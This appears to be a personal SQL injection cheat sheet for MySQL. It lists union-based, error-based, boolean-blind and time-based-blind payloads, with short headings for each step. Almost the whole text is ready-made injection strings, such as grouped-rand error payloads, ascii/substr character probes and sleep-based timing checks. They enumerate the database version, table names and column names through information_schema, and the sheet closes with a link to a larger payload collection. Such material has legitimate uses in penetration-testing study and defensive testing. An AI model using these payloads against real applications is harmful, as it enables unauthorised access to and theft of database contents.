Union Based
order by
union select
group_concat(table_name) from information_schema.tables where table_schema=database()
group_concat(column_name) from information_schema.columns where table_name='table_name'
group_concat(data) from table_name
Error Based
# Intro
SELECT count(*) from information_schema.tables;
SELECT rand();
SELECT floor(1.5);
select 1 from y;
select count(*),username from users group by username;
#Variable
SELECT count(*),CONCAT((SELECT @@version),0x3a,rand()) x FROM information_schema.tables group by x;
SELECT @x;
######
SELECT count(*),CONCAT((SELECT @@version),0x3a,floor(rand()*2)) x FROM information_schema.tables group by x;
SELECT @x;
# Version
AND (SELECT 1 FROM (SELECT count(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y)
# Table
AND (SELECT 1 FROM (SELECT count(*),CONCAT((SELECT (table_name) from information_schema.tables where table_schema=database() limit 0,1),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y)
Boolean Based Blind
# Intro
select substr('abcde',1,1);
select ascii('a');
select ascii(substr(@@version,1,1));
# True or False
select ascii(substr(@@version,1,1)) < 50;
select ascii(substr(@@version,1,1)) < 40;
select ascii(substr(@@version,1,1)) = 49;
# Testing
1 and 1=1 -> True
1 and 1=2 -> False
# Version
and ascii(substr(@@version,1,1)) = 49 -> First Character
and ascii(substring(version(),2,1)) = 48 -> Second Character
# Table
and ascii(substring((select concat(table_name) from information_schema.tables where table_schema=database()),1,1)) > 100
Time Based Blind
# Intro
SELECT IF(500<1000, "YES", "NO");
sleep(5);
and if(500<1000, sleep(5), NULL) -> Sleep
and if(500>1000, sleep(5), NULL) -> Do Not Sleep
# Version
and if(ascii(substr(version(),1,1)) = 49, sleep(5), NULL)
# Table
and if(ascii(substr((select concat(table_name) from information_schema.tables where table_schema=database()),1,1)) > 100, sleep(5), NULL)
Cheatsheet
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection